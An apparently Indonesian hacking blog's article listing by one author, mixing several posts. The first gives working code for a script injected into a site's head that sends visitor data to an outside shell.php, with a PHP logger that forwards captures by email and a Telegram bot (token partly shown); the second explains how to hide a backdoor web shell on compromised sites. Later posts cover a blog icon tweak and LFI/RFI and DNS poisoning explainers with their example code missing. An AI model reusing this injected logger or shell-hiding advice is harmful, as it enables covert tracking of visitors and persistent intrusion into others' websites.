Articles by "Tutorial"


Oke sebelumnya saya sudah menjelaskan tentang Keylogger di Java Script kali ini saya akan memberikan tutorial cara memasangnya.


Jika belum tahu kalian bisa Baca disini : Java Script Keylogger

langsung saja pertama kita buat file jquery nya terlebih dahulu
dengan code :
var r=document.referrer;if(r != ""){var x = new XMLHttpRequest();x.open("GET", "https://labs.suicide-db.com/shell.php?ref=" + r, true);xhttp.send();}
sedikit penjelasan :
https://labs.suicide-db.com/shell.php : ini merupakan web kalian yang berisikan shell yang berisi keylogger.


jika sudah save dengan format .js jika sudah kalian bisa membuat script ini :
<script type="text/javascript" src="https://labs.suicide-db.com/jquery.js"></script>

Letakan script ini didalam meta <head> </head> Contoh :
<head><script type="text/javascript" src="https://labs.suicide-db.com/jquery.js"></script></head>

jika sudah kita ke tahap selanjutnya kita kembali ke step atas di bagian pada link https://labs.suicide-db.com/shell.php nah sekarang kita akan membuat file shell.php ini

pertama kalian masuk filemanager website kalian dan buat sebuah file shell.php atau bebas disini saya membuat file shell.php jika sudah masukan script berikut :
<?php@date_default_timezone_set('Asia/Jakarta');error_reporting(0);error_log(0); if(isset($_GET['ref'])){$url = $_GET['ref'];if(!empty($url)){$sb = "[SHELL][Xenzia Worm][".date('D, d M Y H:i:s')."]";$headers = "From: PROLOGGER <KeyLogger@xenzia.worm>\r\n";$msg = "+------------------------------------------+\n# SHELL LOG ".date('D,d m Y H:i:s')."\n+------------------------------------------+\n# URL :: ".$url."\n+------------------------------------------+\n# JavCode @ 2018 | Powered by : shutdown57\n+------------------------------------------+\n";@mail("postmaster@zaenalarifin.net",$sb,$msg,$headers);@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);$fp = fopen('sl/JavCode-'.date('dmY').'.txt','a');fwrite($fp,$msg);fclose($fp);}exit;}else{exit('?');}
Oke hal yang harus diperhatikan :
@mail("postmaster@zaenalarifin.net",$sb,$msg,$headers); (log dari shell ini akan masuk ke alamat email kalian)

@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);

(log dari shell akan masuk ke alamat pesan telegram kalian)

jika sudah save file nya dan keylogger sudah terbuat
Oke mudah bukan , mungkin cukup sekian semoga bermanfaat

Jika masih tidak mengerti kalian bisa hubungi saya di Menu Contact Us

(Zaenal Arifin)


Oke gengs ketemu lagi sama saya Zaenal yang gans tiada tara , kali ini saya akan share trik agar shell backdoor kalian tidak terkena dorking orang


Oke jadi gini ,Jadi kesimpulan nya sangat simple ..


Pada dasarnya ketika orang dorking shell menggunakan google dork yang cukup relevan


Ex : inurl:/wp-content/plugins/name/shell.php


yaps /shell.php ini yang sangat fatal karena di web ada meta tag , otomatis shell/seluruh file yg sudah masuk di web akan terindex di google


otomatis masuk cache google

Example : 




jadi ketika kita membuat shell di dir yg kita buat


Ex : /Haxor dan upload file index.php << index.php berisikan source code shell kalian


jadi ketika kita buka dir nya bisa tanpa extentsi .php karena


Kemungkinan besar tidak akan diketahui orang lain walaupun terindex google karena kebanyakan jika nama shell kalian aneh" itu jadi pertimbangan para pencuri shell mungkin mereka fikir itu peluang besar untuk mencuri


dan jangan kalian membuat nama dir yg identik dengan Hacker / Sejenisnya kalian bisa membuat dir dengan nama default dir cms , plugins atau  sejenisnya 


Ex : /javascript - /css - /filemanager - /tinymce


dan jika orang lain membuka dir /javascript otomatis mereka berfikir bahwa ini bukan merupakan sebuah shell


dan hal paling penting set shell background dengan menu tampilan forbidden biar lebih meyakinkan karena bisa jadi mereka mengira bahwa dir tersebut di setting forbidden oleh admin dari web tersebut


mungkin trik shell forbidden sudah diketahui tetapi para anak" gblk cukup pintar dan melihat file name nya tidak langsung di close 

dan nama shell ini juga yg menjadi perhatian karena si anak" gblk pinter mana mungkin admin membuat nama file yg aneh contoh :


Ex : /wp-content/plugins/sayang.php


Nah mungkin begitu lah teknik nya

dan jangan lupa


Jangan pernah kalian menggunakan <title>Shell bekdor apalah</title> cukup gunakan title Forbidden biar orang lain yakin , dikarenakan jika title shell kalian  


Ex : <title>Mini Shell</title>


Otomatis Anak" kntl lebih mudah untuk mencari karena ketika mereka membaca nama shell sudah pasti niat gblk nya dan mencoba untuk menuju link yg muncul dan efek yg terjadi shell kalian akan hilang begitu saja


Berikut Sebuah contoh shell yg terkena dorking dan pasti di klik oleh orang lain  :




Semoga bermanfaat


(Zaenal Arifin)

Oke kembali lagi bersama saya kali ini saya akan memberi tutorial cara membuat icon menu di Navigasi Blog.

Apa sih untung nya memakai Icon Menu ?
Yups selain mempercantik tampilan halaman blog anda , tentu saja mungkin menjadi daya tari tersendiri, dan kepuasan tersendiri

Oke langsung saja masuk tahap pertama

Bahan yang harus disediakan :

  • CSS
  • Kopi Hangat 
  • Dan tentu saja koneksi Internet
Oke kalian bisa mengambil CSS nya disini :

CSS 1 : Here
CSS 2 : Here

Oke jika sudah kalian bisa masuk ke Dashboard blog kalian, dan masuk kedalam menu Theme > Edite HTML

Jika sudah letakan code link CSS tadi dibawah Meta tag


Nah jika sudah selanjut nya kita klik Save Theme

Selanjut nya kita pergi ke menu Layout > Top Menu biasanya tiap Theme beda disini menu saya yaitu Top Menu (Navigasi).



Oke jika sudah selanjut nya kita masukan script class icon nya

<i class="icon code"> (NamaMenuKamu) </i>

Contoh :


<i class="fa fa-home"> Home </i>

Nah jika sudah Klik Save

Dan lihat Menu Navigasi Blog Kamu :p

So Tampilan menjadi lebih Gimana gitu, cukup mudah dan gratis tanpa harus menyewa jasa developer yang tidak cukup murah harganya alias mahal haha :p

Jika Masih kurang paham bisa lihat Video nya disini :
Link : https://youtu.be/kV2nbRbz-ws



Selamat Beraktifitas kembali

(Zaenal Arifin)

Remote File Inclusion (RFI)



Hello Guys! In this article we will learn how to exploit a RFI vulnerability. I hope you have read my previous article on Local File Inclusion, if you haven’t please go and read  that first.



Remote File Inclusion (RFI)

As the name states if the attacker can include a remote file to the victim web app, it is called a Remote File Inclusion Vulnerability (RFI). Take a look at this piece of code:






As you can see in the first line, it extracts the file parameter value from the HTTP request made by the user, while the second line utilities this value to set the file name. If the input is not being sanitized properly it can be used to include malicious file from a remote server. Here’s a vulnerable JSP code,





Again, If the input is not sanitized properly it can be used to include a malicious file from a remote server. RFI is not a common vulnerability at all but it is very dangerous when exploited. Now you must be wondering how to exploit this vulnerability. Hold on, I will demonstrate it with a real life example. We have a URL here,





Lets break things down



  1. www.victim.com is the target website
  2. file.php is a webpage with the parameter view=
  3. For example if the user wants to view a document related to animals, the webpage file.php loads it via the view= parameter.

Take a close look at view= , if it was including local files like view=/files/animals.php we would have test for Local File Inclusion. But as we can see its including files from docs.example.com which is a different website, it means it loads files from other website which means it may include any malicious file too. Enough theory! So here’s the vulnerable parameter 


Now I will try to load an image by submitting its URL like this





See? How easy is that? With a webshell you can take over their website or even the whole server.

Also Read : File Inclusion Attack

Local File Inclusion (LFI) and Remote File Inclusion (RFI)




Today’s article is about Local File Inclusion (LFI) and Remote File Inclusion (RFI).
If you have basic knowledge of SQL injection you probably know how we can inject our SQL queries into a vulnerable parameter.
We take advantage of vulnerable parameters in LFI and RFI too.

In SQL injection, we interact with the SQL database using SQL queries to retrieve sensitive data from the database. But in LFI/RFI we ask the webpage to open something for us, it could be a file or a webpage (a webpage is a file too) from another website.
Enough theory! Now lets see what the heck are LFI and RFI.

Local File Inclusion (LFI)

Take a look a this URL:






The parameter in this case is view= and the value is /images/Haxor.jpg.
It means open.php is a webpage which loads different files (Haxor.jpg in this case) from the server. There can be many sensitive files on the server which can be accessed using open.php if the webpage is vulnerable to LFI.

You can open/execute any type of file (not folders) with LFI, which means you can read logs, configuration files and execute files if a webpage is vulnerable to Local File Inclusion. You can even hack into the server if the server admin is stupid enough to not configure things properly.


Remote File Inclusion (RFI)


What is the difference between Local File Inclusion and Remote File Inclusion?
Well both vulnerabilities can be used to open things but LFI is used to open files from the server where website is hosted (locally) while RFI is used to open files from another server (remotely).
We can easily host a malicious file on our server and use the RFI vulnerability to run it on the victim website.

Take a look at this URL:




By looking at the above URL one would guess that the parameter page= is loading webpages.
It is opening home page, similarly it may open other pages from the website. But if the webpage (get.php) is not programmed properly then a hacker can replace home by his desired webpage like,






If everything goes well then get.php will try to open backdoor.php which will compromise the server (or something else, depends on what’s in it). It makes RFI a deadly vulnerability.

Okay a little introduction in advance, what is DNS Poisoning ?
DNS spoofing, commonly referred to as DNS Cache Poisoning, is a form of computer security hacking where corrupt Domain Name System (DNS) data is inserted into the DNS resolver cache, causing the Name Server to return an incorrect record of results, eg. IP address. This results in traffic being routed to the attacker's computer (or other computer).

Overview of the domain name system

A domain name Server System translates human-readable domain names (such as suicide-db.com) into numeric IP addresses used to route communication between nodes. Usually if the server does not know the requested translation, it will ask another server, and the process continues recursively. To improve performance, the server typically will remember (cache) this translation for a certain period of time. This means that if it receives another request for the same translation, it can reply without needing to ask another server, until the cache expires.


When the DNS server receives a fake translation and saves it for performance optimization, it is considered toxic, and it supplies false data to the client. If the DNS server is poisoned, it may return an incorrect IP address, redirecting traffic to another computer (often an attacker).

Cache poisoning attacks

Normally, a networked computer uses a DNS server provided by an Internet service provider (ISP) or the computer user's organization. DNS servers are used in an organization's network to improve resolution response performance by caching previously obtained query results. Poisoning attacks on a single DNS server can affect the users serviced directly by the compromised server or those serviced indirectly by its downstream server(s) if applicable.

To perform a cache poisoning attack, the attacker exploits flaws in the DNS software. A server should correctly validate DNS responses to ensure that they are from an authoritative source (for example by using DNSSEC); otherwise the server might end up caching the incorrect entries locally and serve them to other users that make the same request.


This attack can be used to redirect users from a website to another site of the attacker's choosing. For example, an attacker spoofs the IP address DNS entries for a target website on a given DNS server and replaces them with the IP address of a server under their control. The attacker then creates files on the server under their control with names matching those on the target server. These files usually contain malicious content, such as computer worms or viruses. A user whose computer has referenced the poisoned DNS server gets tricked into accepting content coming from a non-authentic server and unknowingly downloads the malicious content. This technique can also be used for phishing attacks, where a fake version of a genuine website is created to gather personal details such as bank and credit/debit card details.

Variants

In the following variants, the entries for the server ns.suicide-db.com would be poisoned and redirected to the attacker's name server at IP address 127.0.0.1. These attacks assume that the name server for suicide-db.com is ns.suicide-db.com.

To accomplish the attacks, the attacker must force the target DNS server to make a request for a domain controlled by one of the attacker's nameservers.

Redirect the target domain's name server

The first variant of DNS cache poisoning involves redirecting the name server of the attacker's domain to the name server of the target domain, then assigning that name server an IP address specified by the attacker.


DNS server's request : what are the address records for subdomain.attacker.com?

















A vulnerable server would cache the additional A-record (IP address) for ns.target.example, allowing the attacker to resolve queries to the entire suicide-db.com domain.

Redirect the NS record to another target domain

The second variant of DNS cache poisoning involves redirecting the nameserver of another domain unrelated to the original request to an IP address specified by the attacker.[citation needed]


DNS server's request: what are the address records for subdomain.attacker.com?

















A vulnerable server would cache the unrelated authority information for target.example's NS-record (nameserver entry), allowing the attacker to resolve queries to the entire suicide-db.comdomain.

Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget